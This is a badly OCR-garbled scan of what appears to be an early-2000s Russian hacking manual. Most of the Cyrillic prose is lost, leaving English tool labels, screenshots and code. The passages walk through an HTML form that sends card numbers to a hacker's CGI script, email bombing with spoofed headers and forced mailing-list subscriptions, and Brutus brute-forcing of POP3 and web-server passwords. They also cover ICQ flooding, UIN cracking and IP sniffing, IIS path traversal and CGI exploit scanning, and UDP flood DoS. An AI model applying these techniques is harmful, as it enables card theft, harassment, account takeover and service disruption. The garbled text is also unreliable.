("<11<>
Bubliki&Baranki</TITLExHl>3aKa3
VirtualAir</Hl>
<FORM
ACTION^'http://www.AnyHackerSite.com/cgi/GetCardNumber'
METHOD=post>yKa5KMTe <>< TYPE=text><BR>VKa*oiTe
<><INPUT TYPE=textxBR>yKa*aiTe
KapTO4KH<BR>< INPUT TYPE=textxBR><INPUT
TYPE=checkbox VALUE=OK>H VirtualAir<P> <INPUT
TYPE=submit VALUE=''></PORM>");
z.document.close();
}
</SCRIPT>
<H1 ID="header"> VirtualAir</Hl>
79
Bubliki&Baranki VirtualAir,
! < HREF="javascript:var a;" onclick="falsify()"
onMouseOver="window.status=
'http://www.Bubliki&Baranki.com 1 ;
11
return true;
onMouseOut= "window. status= I i n > ,
</A> Bubliki&Baranki!
</BODY>
</HTML>
8.7 IE 5 , . 5.3.
- http://www.Bubliki&Baranki.corn
Rog&Kopito
.
Web-
Rog&Kopito
Bubliki&Baranki,
Web-
Rog&Kopito .
(, ,
.)
,
Web- Bubliki&Baranki.
Web, . 5.4.
Web-
. 5.4
.
80
VirtualAir
& ;1
VutualAir,
! ,.
Bublild&Baranki!
. 5.3. Web-
Rog&Kopito
File
Edit
View
Favorites
Tools
Help
Go
VirtualAir
D VirtualAir
IDons
| My Computei
. 5.4. /-
VirtualAir Bubliki&Baranki
Web
CGI- GetCardNumber,
Web-, Rog&Kopito:
<FOKM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber 1
METHOD =post >
-
(Address) ,
,
, , .
IE Address Javascript.
URL HTML IE 6, ; , IE 6 HTML
. !
, ,
Web- - . , ,
, .
, , ,
, Web . .
, , , Web.
,
Web-
. . -, , ,
81
, .
.
, ,
.
- Web-, -
, .
:
. , ,
SSL.
Web-
.
.
, , ,
. .
, . , , ,
, . .
Web - .
,
. , , , , Web . ,
- Web
, , - , , .
, ,
4 IE Netscape, , 5 6 .
, ,
.
82
6.
, ,
, ,
, .
, . , , .
, ,
,
, ,
... , - !
- (, , , 1,
). ,
,
,
! ,
. ? -
-
- .
( Flood - ,
) ( Spam - , . Spam ). (..
), , ,
.
, -
SMTP-. Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . ,
DnD, .
Avalanche - Avalanche
DnD, .
. 6.1 DnD 4.O.
Clones
Header
Session
Random Lists
Mailing Lilts
Window
Extras
_pj
CC:
Message Body:
| SMTP Spy
Help
20.01.2003.
DnD Settings
(), DnD (. . 6.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net.
> Spoof Host ( )
, .
, .
Randomly Change ( ) ,
SMTP-.
>
SMTP-,
Edit Server List ( ). Random
Server List ( ), . 6.2.
mail.sisna.com| | why.net
|widQwmaker.co| Iclubmet.mettob |
| Iplix.conr
j jcabletegina.co |
J |maple.nis.net
Idubmet.metrob | ltMvl.net
| vitro, com
Puc. 6.2.
SMTP-
SMTP-
Random Server List ( ) .
Submit ().
Size of Bomb ( ) (. 6.1)
:
# of messages to send ( )
.
10.
Never ending bomb ( ) .
85
Check the box and then fill in the information that will appear in the
headers under that category; or uncheck the box to remove it from
the headers.
X-Mailer:
X-URL:
X-Sender:
X-Date:
Q Return Path: [
Q References: |
Priority:
Q X-Authenlication Warning
| Generate IP |
|124.49.153.SO
Ok
[TedGilsdorf
Clear
Cancel
13
, DnD , . , ,
.
, Clone ()
E-Mail bomb ( ) Bomber Spawn 1 (
), . 6.6.
-a Bomber Spawn 1
Sendbombto:
-1
Randomly Change
Message Subject:
| |
Random
Message Body:
1
SMTP Server:
gl Randomly Change
ya
j?
[Status
{Messages Sent! |0
Puc. 6.6.
88
, Bomber Spawn 1 ( ) E-Mail bomb ( )
-
SMTP-. ,
SMTP-. - - , !
- .
, , ( - ).
> , DnD Clones Load Multi Clones ( * ). Number of clones (
), . 6.7
Number of clones
How many clones do you want to load?
Puc. 6.7.
- !
> Number of clones ( ) ( 5-6) .
Bomber Spawn
( ), 1 -
. Send Bomb ( )
. -
!
&&
! , - ,
89
! DnD
, , Mailing lists ( ). Subscribe
joe lamer to mailing list ( ),
. 6.8, ,
Euro Queer ( ), Mormons (), Family Medicine
( ) -
!
1=1
CMd Parenting
|j0hn
Mormons
Christianity
Gay/Lesbian
womanism
Euro Queer
people
Lesbians over 40
Bi Australians
Family Medecine
Allergies
,
, DnD , ,
, . ,
Extras Pword generator ( * ).
Randomic Password Generator ( ), . 6.9.
, How many characters? (
?) ( - 8 )
: Use Both ( ) - , Use numbers ( ) - 90
Use
letters ( ) - . - , ,
.
6i2i9e1m5p8i
Close
Clear box
Extras ()
- . 6.9.
SMTP- (
SMTP Remote ( SMTP)),
( Raw Port ( )).
, ( , SMTP). Other Tools
( ) . - , ,
.
, - ;
. ,
, . , ( ). , .
. , ,
- (
IMAP) , .
- .
Brutus Authentication Engine Test 2
( Brutas , 2),
Brutus AET2 (http://www.hobie.net/brutus). . 6.10
Brutus,
, FTP, HTTP, Telnet
NetBus.
91
Tools
Target
(SisJEI
Help
|127.0.0.1
Ti"pe|POP3
|~| | Start
| Stop [Clear
Port (110
Connections 10 Timeout ^} 10
0 Use Username
Single Usef
| | Browse |
I Type
5J
II
I Username
|
II
I Password
R*cl
AuthSeq
Throttle Quick Ki
ll>dle
,
Brutus ( 8
Brutus IIS). , alex-1 .sword.net,
kolia. , ,
- ,
.
.
> Brutus - 2 (. 6.10) Target () , alex-1.sword.net.
> () ,
.
> Connection Options ( ) Use Proxy ( ),
-
.
> Authentication Options ( ) Single User ( ) -
.
92
User file ( ) , .. - kolia.
> Pass Mode ( ) Brute Force
( ). Brutus ,
. 6.11.
Tool.
Target
Help
|alex-1.sword.net
Type|POP3
nnection Optioru
>orl [110
I 10
I 10 Timeout
Connections
IPS Options-
| Modify sequence |
-Authentication Options
0 UseUsemame
UserlD
0 Single User
| kolia
Target
I Username
| Password
Rtet
AuthStq
Min Length [
Lowercase Alpha
Max Length [4 [T
Uppercase Alpha
Mixed Alpha
Cancel
Alphanumeric
Full Keyspace
Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! |
Puc. 6.12.
93
Brutus - Brute Force Generation (Brutus -
) - ,
, . ,
- , Min Length ( ) 3, Max Length ( ) - 4. , Digits only
( ).
.
> Start () Brutus - 2
Brutus - 2. . 6.13.
1=1
Took
Help
Target | alex-1.sword.net
Type|POP3
i-Connection Option*
I
Port [110
Connections
10
10 Timeout
I?
-Authentication Options
El Use Username
UserlD
0 Single User
I Range
DisllbAed
[kolia
I Type
POP3
| Username
kolia
I Password
0007
Positive authentication at alex-1 .sword.net with User : kolia Password : 0007 (1 0997 attempts
Timeout
10997
Uikolia P:0000
Reject
Throttle
Quick
|Idle
Puc. 6.13. 1.
Positive Authentication Results (
) , kolia - 0007.
, Brutus 10997 alex-1.sword.net (
11000). 5 Pentium 3
1000 ,
Ethernet 10 /.
,
, Brutus (
94
). -, , , ( 8 !),
, (, &$ ..).
!
Brutus - Brute Force Generation (Brutus - ) 8 ,
Full Keyspace ( ). Start
() Brutus - 2
- 6 095 689 385 410 816 - , !
12 ?
, , ,
(., , [10]). Brutus,
Pass
Mode ( ).
( 100 000), ,
. , password, parol, MyPassword
- Web- -
.
-,
,
, Ethernet, 30-50 / (
). -
. -
, - , ,
,
.
. , , , ,
, . .
- , .
95
IIS Brutus 8 , - . ,
, . , , ,
- , -
! :
!. .
, , ,
. 1, , , , . - ,
, , ,
. ,
- ( - ),
.
, - ,
. . ,
TFTP 1-1 , 1-1 . , TFTP
, .
TFTP
, ,
, . , , , ,
,
.
. , ,
96
( ) . ,
, , Web- - .. ( ,
). . - , , , -.
. - , ..
,
- , ,
. , ..
, -
-
. , 2002 ., , ,
.
Web-. . . ...
(
). Web-, ,
?, .
, , ?, ?,
? . -
, ,
, ,
. , , , , ,
. ,
, - ,
,
repa_parenaia, - !
- . , , ,
,
. 97
4 - 5830
- , , ,
- , . .
, - .
,
. , (
) , -
!
.
,
8 ( 12) , , .
,
DnD .
.
, - , Norton Antivirus
MacAfee VirusScan.
,
- PGP Desktop Security.
, .
, - , ,
, .
- - , .
98
7.
ICQ
ICQ Intelligent Call Query, .
ICQ [--] : I Seek You - ; ,
ICQ . ICQ
,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, . , , ICQ,
,
. , , - .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mira-bilis.com. ICQ - ICQ , , 1998,1999, 2000,
2002, ICQ 2003. ICQ
UDP, 4000, -
TCP, .
, ICQ, UIN (Unique Identification Number -
). UTN -
ICQ , .
, ICQ?
ICQ ,
. , ? .
-,
ICQ,
. -, ICQ ICQ
.
, ICQ, :
, UIN ,
, . , ICQ , - ICQ . , , - .
ICQ-, , IP-
ICQ-, , . , , DoS, 9 . ,
IP- ICQ, -
, ICQ- .
!
, ICQ-,
. ,
,
, - ,
.
ICQ,
Mirabilis
. ICQ, ICQ , .
,
.
100
ICQ
ICQ
. - ,
ICQ
ICQ ICQ. ,
ICQ ; , ICQ- (,
LameToy
www.mirabilis.com). , ( )
,
.
,
, ,
, ,
.
, ICQ. .
. Sword-2000
ICQ Groupware Server, Alex-
ICQ Groupware Client, UESf, 1001, 1-1 ,
UIN, 1003. ICQ Groupware
http://www.icq.com.
ICQ, ICQ
Groupware, ,
, 1. - , ICQ - ,
ICQ
. ICQ
ICQ-,
ICQ-, ICQ- .
101
Selling-
Losei-
LLMZ.
JQ044J
Pott Scarmei- |
[Normal Message M
-UlNSniffer-
1.
Sendei
miNBIiOOl
IPasswdL
l|URL|hHp:/V
Messsage
ICQ
). ,
, , , .
, ICQ-,
- , UIN UIN
. , ICQ (ICQ99a
ICQ99b) . DB-
( - ), DB Data Base - , ,
DB NewDB. LameToy ,
DB killer ( DB)
Setting ().
ICQ, .
, , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker
.
lf~ac)peca ICQ-
DoS ( ) ,
- . ,
, , Advanced ICQ IP
Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml).
. 7.2 Advanced ICQ IP Sniffer.
a a a'
| Password: IJ
Clear list
Cheek
Saver
Ext IP: |
Status: |
|TCPFIa9: |
IntIP: |
TCP Pott: |0
| TCP Version: |0
103
IP- ICQ UIN, Advanced ICQ IP
Sniffer ICQ, UIN . , , Your UIN ( UIN) Password
() Advanced ICQ IP Sniffer (
ICQ). Check ()
, ICQ
UTN , Info
() .
, Info () . 7.2
, ( ) IP- ICQ,
TCP-, ICQ . , , Ext IP ( ), Int
IP ( IP) TCP Port ( TCP). ,
ICQ- ( ).
ICQ, Advanced IP ICQ Sniffer,
ICQ server's address and port (
ICQ), Server () . 7.3.
[4000
| |
OK
Cancel
. 7..
ICQ server's address and port
( ICQ)
ICQ, , , ICQ-,
ICQ- ICQ. ,
,
.
, ICQ, ICQ-MultiWar
(http://www.paybackproductions.com/), - ICQ Flooder
(. 7.4).
104
ICQ
ICQ Flooder
File
Victim's address: 127.0.0.1
Message:
Eat this!
ICO Flooder 1.2 Copyright (C) 1998 dph-man and Implant Man
http://mht.hut.ru/icq/icq.html,
( , , ICQ , ). ICQ - ,
, , -
!
ICQ
ICQ,
ICQ, ,
. ,
, .
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.
OICO SubMachineGun vl.4 by uD
File Settings About
[ Bruteforce ]
About
[... [ 13 Single
[~~] Single
Agent
Force!
106
ICQ
brute
force - , ,
.
.
ICQ ICQ subMachineGun
.
>
ICQ subMachineGun.
port
[ Cracking ]
13 Stop if successful...
Make log of cracked uins
0 Reconnect if timeout
0 Cut passwds length to 8 digits
set timeout:
relogln ;
times
Cancel
OK
Reconnect if timeout (
) ICQ
.
Cut password length to 8 digits (
8- ) 8- .
> set timeout ( ) 15 .
> relogin ( ) ICQ
3.
ICQ subMachineGun
UIN . .
> ICQ subMachineGun Bruteforce
( ) UIN. .
Single
() UIN,
.
Single
() UIN.
UIN,
(...) Making victims list ( ), . 7.7.
Making victims list (
) Range () ,
, UIN ( - 100000)
( 900900).
Puc. 7.7.
UIN
108
ICQ
, Generate ()
- UIN, , , ..
Add () UIN .
> UIN,
Open () UIN ( UIN ).
> - UIN ,
t0*"!. Clear () UIN ( ).
UIN, .
.
> ICQ subMachineGun Bruteforce ( )
. .
Single () , .
Single () .
> ,
(...) Make passlist
( ),
. 7.8.
Make passlist ( )
.
> Open () (
).
- ,
ICQ.
Puc. 7.8.
v Generator ()
Add (). , .
109
> , 0
*"**]. Clear ()
( ).
> , .
.
Force (). , ICQ
subMachineGun v1.4 (. 7.9).
OICQ SubMachineGun vl 4 by uD
File Settings About
[ Bruteforce ]
About
[] 0 Single
[~~] D Single
Agent
Puc. 7.9. -
ICQ subMachineGun v1.4,
UIN, ( , . 7.9 ). ,
, 15 ,
ICQ.
- 45 ,
( ). ,
, , , , .. - .
...
110
ICQ
(
-, , ICQ -
. ICQ , ICQ . ,
? - ! ,
? ,
ICQ- , .
,
.
? ,
Windows.
, . ,
ICQ ,
ICQ.
ICQ-, ,
ElcomSoft Advanced ICQ Password Recovery
(http://www.elcomsoft.com).
, .
. 7.10 Advanced ICQ Password
Recovery.
6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L
, , ICQ
2002 2002.
2002 , UIN .dat,
.., , 207685174.dat
(207685174 - UIN ).
ICQ Password successfully found! ( ICQ ), (. 7.11).
% Copy to Clipboard
fij Close
Puc. 7.11.
!
. 7.11,
ICQ 99b - 2000b, ICQ 2002 ( ).
, ICQ
, - , - ICQ-. - , , (. [11]), Web- (. 8). ,
, ,
.
, ICQ
( ) , . , ,
,
ICQ. , ,
ICQ - ,
- . , .
ICQ,
.
. , , ICQ- - ICQ . ,
ICQ , UIN . -
112
ICQ
?
, , , - ,
. , , - , , , ,
, , - . ICQ - , , ,
,
, , , , .
- ,
.. ICQ, , ,
. ,
ICQ ICQ,
ICQ (
, ICQ Team
(http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ.
- , .
, ? ,
, . ,
- , ? , ... ,
, , .
ICQ-, -
,
.
ICQ , . ICQ - ,
113
ICQ-.
ICQ DoS ...
.
ICQ
. -, ,
ICQ-, ICQ-, ICQ- .
ICQ,
ICQ. IP- , ,
ICQ. ICQ .
, ICQ-, UTN
. , ICQ-, -, , BlacklCE Defender,
DoS. -
, , .
,
. ,
ICQ -
.
-, -
ICQ, ICQ. , IP- ICQ-,
- . ,
.
, . ICQ , PGP Desktop Security 2.9,
ICQ-
. ,
PGP- ( [7]).
114
8.
Web-caumoft
Web? , Web
,
. Web-
, Web- .
, , , .
, Web-
, ,
, , .
HTML Web-
( - ),
, . HTML
.
(
).
, Web-, , Web-,
, . HTTP, , , .
Web-,
, .
, Web-, DoS
,
, Yahoo.
,
Web-, , ( ) Web- ,
. Web , .
Web~cauma
Web
Web , , Web, Web,
, .
1 Web~cauma
,
Web-,
. ,
.
116
Web-
Web- - ,
, , , , Web .
Web- - Web- ,
, TCP- 80, , Web-,
( CVE, Web-), Web- - .
Web - - ASP, Java, CGI -
, .
Web - , -,
, -, ( !).
, , - . , , (cookie),
, .
- Web-
, , . , , CGI- , -
CGI- , , , .
- ,
Web- , .
- , Web-
, ,
, -
.
- , , ,
Web-, Web-, .
, (, . []).
, , , , IIS 5. ,
117
(
HTTP), CGI- (
) Web
( Web).
Web- , .
IIS , Web-,
. , Web- ,
- , .
- , Web-. - . , FTP- , , .
, .
Web- .
Web~cauma
,
Web-,
. , , ,
, . , , .
, Web- , - , , DNS-,
.
Web.
,
.
118
Web-
cbp
Web-
.
.
-, ,
- ,
. IP-, , ,
.
Whols .
-, HTML- Web- . HTML , Web, , .
, , , , JavaScript . , HTML- Web
Web- Teleport Pro.
, , Whols - , ,
Web.
whois (
Unix), Web- , whois Web-.
Whols
. , ,
. 1999
- Network Solution (http://www.networksolution.com),
, , InterNic (http://www.internic.net). / .
Web-,
Whois ( ),
. Whois
, ,
119
, DNS
. ,
RIPE NCC (Network Coordinate Center - ),
IP-
. Web- RIPE NCC (http://www.ripe.net),
. 8.1.
<* $ -V gjj [JQ J j i^ ^ j ^j* 4>t @ T 1
Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^^
El ^ |
,
SuperScan (http://www.foundstone.com),
. 8.2.
SuperScan, .
> Start () - .
> Stop () .
> Scan type ( )
All list ports from ( ).
> Start ().
120
Web-
Timeout
StarlfTMT
Stop|l.0.0.5
0 Ignore IP zero
0 Ignore IP 255
Extract from He
P'ng
|400
Resolve hoslnames
121 Only scan responsive pings
[3 Show host responses
Conned
Ping only
|2000 |
5 EZB
. 8.2.
SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. (
),
.
wa-
M.0.0.1SMy Documents
M.O.(mNETLOGON
M.0.0.1\D
M.0.0.1\Tesl
. Downloads
M.0.0.1\SYSVOL
1.0.0,1
My Documents
NETLOGON
D
Tesl
My Downloads
SYSVOL
Map Drive
. 8.. IIS 5
121
Legion (http://packetstormsecurity.org/
groups/rhinoS),
- 1.0.0.1 . 8.3.
, - IIS 5,
- , ? .
| II5
IIS ,
HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, .
HTTP , , [12], - Web . HTTP ,
GET. Web-
(, ),
GET,
,
,
http://www.anyserver.com/documents/order.html.
order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , , [12],
.
HTTP, :
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2
MyScript - , /scripts IIS, a
?1+2 ,
MyScript. IIS ,
, ,
.
CGI, ASP
(Active Server Pages - ) ISAPI (Internet Server
Programming Interface - ). ASP :
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2=
2
122
Web-
MyScript.asp, , , HTML. ISAPI
, ISAPI. HTTP:
http://www.anysite.com/isapi.111?1&2
, IIS, , .
HTTP ,
IIS . IIS 2.0 :
http://www.anysite.eom/.7.7.7.7.7winnt/secret.file
Web- , secret.txt.
- Windows, ACL.
IIS , Web-
[3]. IIS
, , , , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS,
netcat (http://www.atstake.com), (netcat - - [3] netcat IIS).
netcat Sword-2000
,
. netcat .
> Alex- netcat,
nc -vv 1.0.0.1 80.
v
GET / HTTP/ 1.0 111. . 8.4.
GET / HTTP/1.0
IIS. . 8.4, HTML,
.
123
ic-MCommand Piompl
c:\test\netcat>nc -vv 1.0.0.1 80
HTTP
suord-2000.suoi-d.net
/1.0
Seruer: M i c r o s o f t - I I S / S . 0
Date: Fri, 28 Feb 2003 12:55:40 GHI
Content-Type: t e x t / h t n l
Content-Length: 87
<>itml><}iead><title>Error</titleX/head><body>The parameter
</htnl>sent 17, rcud 224: NOISOCK
C:\test4netcat>
124
Web-
: Command Piompt
- . 8 . 7 88 < a d c o d e . t x t
a t c l . : flLEX-1 = ftLEX-1. suoi'a. n
IftLEX-l E l . e . B . 7 ] 88 O i t t p > open
I H T T P X 1 . 1 289 OK
ISevvev: H i c v o s o f t - I I S X 5 . 8
( D a t e : S a t , 81 Mar 2883 8 7 : 1 6 : 4 2 GMT
.
. : C81B-81F8
86.12.2882
22.12.2882
13.81.2883
86.81.2883
86.81.2883
87.82.2883
28.81.2883
86.82.2883
18:37
<DIR>
8
132348275
> 713: NOTSOCK
|C:Xtest\netcat>
. 8.5. 1-1 !
, 1-1
! Sword-2000 ( Windows 2000 Advanced
Server Service Pack 2) - Microsoft ,
2000 . ,
URL ,
(. [3], [4], [11]).
, Windows 2000 ?
- ,
? ,
.
Web-, IIS, -
, Web-.
, Web- CGI (Common Gateway Interface - ), , Web .
CGI, , .
Web-,
.., IIS, System, . .
125
, CGI- , , . , -
, ,
,
. , - .
, , Perl, , ., , , ,
,
D@MNED CGI Scanner 2.1 (177 exploits)
, ,
\>
. - , - , ,
Web, -
.
, ,
CGI-, , READY
Web-, Puc. 8.6. CGl-
D@MNED CGI Scanner 2.1
.
CGI-
D@MNED
CGI
Scanner
2.1
(http://shieldandsword.narod.ru/soft/scansec/
scansec.htm). . 8.6 ,
.
, D@MNED CGI Scanner 2.1.
Scanners log ( )
. , , , .
Scan list ( ), . 8.7, , .
,
, .
-
126
Web-
. , ,
.
, .
Scan subnet ( ) -, . , : 234.56.78.1 - 8.
CGI holes ( CGI) (. 8.8) CGI-,
.
, ,
,
Scan list ( ).
1 g UttiMNtO CGI
.1 (177 exploits)
. 8.8.
CGI-
. 8.7.
2
D Use proxy
|
:
. 8.9. CGl-
!
English
. 8.10. CGl-
127
Spy () (. 8.9),
Web- ( - IIS 5.0),
( ).
Option (), . 8.10,
-, . - -
- -,
- ( , ...).
D@MNED CGI Scanner 2.1 .
1-1
IP- 1.0.0.7, .
> Scan list ( )
http://www.altavista.com IP- 1.0.0.7.
> Scanner log ( ) . ,
. 8.11.
.
( . 8.11 200
500) ;
. ,
200
- , 500 - .
200 (
- SUCCESS)
.
2 1 (177 exploits)
1:0,0.7/
1.0.fl,7/_v
1.0.0.7/ils
1,0,0,7/it
I.U.0.7.
1.0,0.7.
,s]f-
0,7/
1.0.0.7/ib
1.0.0.7/!
to:o.7/i
1.0,0,7/i
" -.0.7/1
,0,7/ilssam
.0.7/msai
>.SS )
3 ]
- 5(
. 8.11.
,
IIS 5.0
D@MNED CGI Scanner 2.1
.
, , .
, 1, , MITRE CVE (http://www.mitre.org). ,
. 8.11, IIS .htr .idq.; MITRE.
CVE-2001-0500
128
Web-
Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary
commands via a long argument to Internet Data Administration (.ida) and
Internet Data Query (.idq) files such as default.ida, as commonly exploited by
Code Red.
( ISAPI (idq.dll) Index Server 2.0 Indexing Service 2000 IIS 6.0 -
.ida (Internet Data Administration -
) .idq (Internet Data Query - ),
, default.ida, Code Red.)
Reference: BUGTRAQ:20010618 All versions of Microsoft Internet Information
Services, Remote buffer overflow (SYSTEM Level Access)
Reference: MS:MS01-033
Reference: CERT:CA-2001-13
Reference: BID:2880
Reference: XF:iis-isapi-idq-bo(6705)
Reference: CIAC:L-098
, CGI- IIS
- IIS. , ,
http://www.securitylab.ru. ,
, .
" IIS .htr
, Web . "" , .htr (ISM.DLL).
IIS 4.0 5.0 SP2 1 2002.
IIS - , , . ISAPI , .htr , ISM.DLL.
ISM.DLL . IWAM_COMPUTERNAME.
. IIS 4.0-5.1."
129
5 - 5830
, SecurityLab.ru Unix Pyton, . ,
, ( ,
).
CGI Vulnerability Scan (http://www.wangproducts.co.uk),
. 8.12.
aglimpse
Anyform2
args.bat
args.cmd
AT-admin
Auth
bnbform.cgi
bsguest.cgi
bslist.cgi
calender.pl
campas
carbo.dll
CGI Counter
CGImail.exe
cgiwrap
classifieds.cgi
+ Deselect All
Scan All
-/
<a
f Clear Log
Proxy Setup
&
Ex*
Idle...
130
Web-
Web .
Teleport Pro.
Web'cnsuc)ep*feLeport fro
Teleport Pro Web-, Web- . Teleport Pro , ( ), , Web Web-.
, ,
- spider - .
Web-
Web - . , , , . Teleport Pro .
Web-
.
Web-, .
Web- .
Web-.
Web-, Web-.
Web- .
Web-.
Teleport Pro , Web ,
.
Teleport Pro , , Web.
, , Web.
Start () - , Teleport Pro ,
131
Web, Web-, , .
Web
. , Teleport Pro Web
, .
Web- , Web, .
Teleport Pro . 8.13.
.
> Teleport Pro File New Project Wizard
( ). (. 8.14).
. 8.14
Teleport Pro.
Create a browsable copy of website on my hard drive - Web- .
132
Web-
I
. 8.14.
Teleport Pro
Duplicate a website, including directory structure - Web-,
.
Search a website for files of certain type - Web- .
Explore every site linked from a central site - ,
.
Retrieve one or more files at known addresses -
.
Search a website for keyword - Web- .
Project Wizard - Step 2 of 4
Starting Address
Enter an Internet address to serve es the starting location for
this project. Examples of valid Internet addresses are
"www. micro soft. com", "www.netscape.com/products/", and
"www.ibm.com/home/ind8x.htm".
|3
I
. 8.15.
Web
133
- Web . , Next
(). (. 8.15).
*
,
. , ,
Teleport Pro 1.29.1959 HTTP FTP.
Web;
, New Address ( )
.
Up to ... links from this starting point ( ...
) Web , ( 3).
Next ()
(. 8.16).
Project Configuration
When dealing the local website, retrieve:
Justtexl
Text end graphics
Text graphics, and sound
<3> Everything
Puc. 8.16.
. 8.16 , Web
. :
Just text ( ) - .
Text and graphics ( ) -
.
134
Web-
Text, graphics, and sound (, ) , .
Everything () - .
, , Account ( ) , Password
() - .
Next ()
(. 8.17).
Congratulations!
YouVe just created oTeleport Pro project!
When you press Finish, you will be asked to save the project
Choose name for it in the Save dialog box.
Teleport Pro will save the project then create a folder, named
pfier your project in which it will store any retreived files.
Whenyou're readyto run the project pressthe Stari( )
button on the toolbar, or select Start Irom the Project menu.
Puc. 8.17. !
. 8.17 ,
Start ()
Start () Project ().
> Finish () (. 8.18) .
Save in: | Si Teleport results
<
'3 yahoo
yahoo
Filename:
Iklingonj
Save as type:
Project
Properties ( ), . 8.19
Project * Project Properties ( * ).
Summary | File Retrieval | Browsing/Mirroring | Exploration | Exclusions | Netiquette | Advanced
0 Always save KTML pages
D Re plicate the directory structure of remote servers
El Use MSIE-compatible filenames (appends .htm to HTML files where necessary)
Cancel
I I
Apply
Puc. 8.19.
Project Properties ( ) , .
, Browsing/Mirroring (/ ), . 8.19.
Browsing/Mirroring (/ )
,
, ,
,
. .
Always save HTML pages ( HTML) Teleport Pro HTML, .. Web-,
, ,
Web, . , Web-
, ,
Web- .htm .html.
Replicate the directory structure of remote servers (
) 136
Web-
, .
,
, .
Use MSIE-compatible filenames (append .htm to HTML files where
necessary) ( , MSEE (
.htm HTML)) IE ,
HTML, .htm .html (, .shtml .pi). ,
, Teleport Pro
HTML, .htm .html,
.
Linkage System ( ) , , ,
. Localize links for all retrieved files
( ) ,
, Web.
:
Link to a message that explains why the file was not retrieved -
, , . , ,
, .
Link to the Internet address for the file - .
,
.
Link to a place where the local file will be stored - ,
, ..
Web .
Web- , .
Teleport Pro
HTML- , , , , Java, . , -
.
137
Linkage System (
) Link using 8.3 filenames (, 8.3) , DOS . , ,
8.3.
Relink all files in the project now ( )
HTML
, .
, , , Web-. HTML
Web-? , Web- , ,
Web-. , Web* HTML.
?
-, - ,
. , , , - ,
. , - .
-, - , , - , , . , , , Web-
CGI. HTML CGI-,
.
, . ,
. , -
.
, ,
, , Web , ,
Retina (http://www.eeye.com/html/Products/Retina/). ,
Teleport Pro (http://www.tenmax.com) 138
Web-
HTML-
, Web.
, Web ? ,
Web, ,
- . HTML, HTTP.
, , .
Web-,
.
- ,
Web- ,
/ Administrator/password
( , , [3] , (!!!)
Web).
, , Brutus Authentication Engine Test 2 ( 2), Brutus AET2 (http://www.hobie.net/brutus), , .
, HTTP.
. 8.20 Brutus.
Taigel |1.0.0.1
rConnection Options
Port I S ) I
10 Tmeout
Connections
[HEAD
-eepAlive
:ion Option*
0 Use Username
0 Single User
Timeout
991
^Administrator R009
Reject
I Password
AuthS
Thre*
. 8.20. Web-
139
IIS
Sword-2000, .
> Target () IP- , 1.0.0.1.
> ()
, . HTTP (Basic
Authentication) (HTTP ( )) -
HTTP, ( IIS
Windows IIS).
Authentication Options ( ) , . Administrator,
Use Username ( ),
Single User ( ).
> Pass Mode ( ) Brute
Force ( ), , .. .
> Range (). Brutus - Brute Force Generation (Brutus - ), . 8.21.
Brutus - Brute Force Generation Brutus - Brute Force Generation
Q
(Brutus -
Min Length |0 |" Digits only
) - - Lowercase Alpha]
Length | [-
, Uppercase Alpha
|
OK
| Cancel
IIS - Mixed Alpha
Alphanumeric
. Full Keyspoce
;
Custom Range |e7aoinsmldcumfpg^bvfcxjqzl 234567890 \
Min Length (
), Max Length ( Puc. 8.21.
) - 3.
, Digits only ( ).
.
> Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.
140
Web-
^^^^11 X Brutus - AET2 - www.hoobie.net/brulu: - (January 2000)
File
Tool
Port 1 30
Method
(HEAD
PI
10 Timeout
Connections ^
'
0 Use Username
U sell D
Help
10
Stop | Clear
0 KeepAlive
0 Single Usei
[Administrator
|Biw*|
Fife
lwrdi.txt
|||
1 Type
1 Username
HTTP (Basic Auth)
Administrator
1 Password
007
Positive authentication at 1 .0.0.1/ with User : Administrator Password : 007 (992 attempts)
Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992
^* ** ** ^ ^.
992
||U:Adrniriistrator P:000
||ldle
/f
141
, ,
, .
Web, , - . Web
, . , , . , Windows NT/95/98,
Web- CGI Vulnerability
Scan D@MNED CGI Scanner 2.1, ,
, Web, ,
.
, Web-, , ,
. Web - ,
Web- .
, Web- - , Retina, , , [7]. Web- -
, .
142
9.
UoS
, TCP/IP, TCP/IP , . , , - ,
DoS (Denial of Service ). DoS -, TCP/IP .
DoS , . DoS ,
, Yahoo, eBay, CNN.com, www.Microsoft.com,
, [3].
,
- , , , .
DoS ,
,
, , .
, [3], DoS
, . , , , , DoS Web-; , DoS
. ,
, - , DoS.
,
DoS ,
. DoS , ,
,
, - - IDS (, BlacklCE Defender
(http://blackice.iss.net/)), .
DoS,
, .
'
DoS ,
.
, , DoS .
- ,
, , ( Web- Yahoo).
. , , 1 ( 1544 /), , , 56 / ( ).
- ,
, , .
.
- ,
.
- , ,
.
- , .
,
.
- ,
, .
.
DoS , , .
144
DoS
,
. 1, Web- [3], , . ,
, .
, . , - UDP ICMP.
DoS, , ,
/.
.
, UDP
UDP, . , DoS, UDP Flooder 2.0
Foundstone (http://www.foundstone.com), , - , .
. 9.1 UDP Flooder 2.O.
UDP Flooder 2.0,
DoS 1-3
IP- 1.0.0.5 .
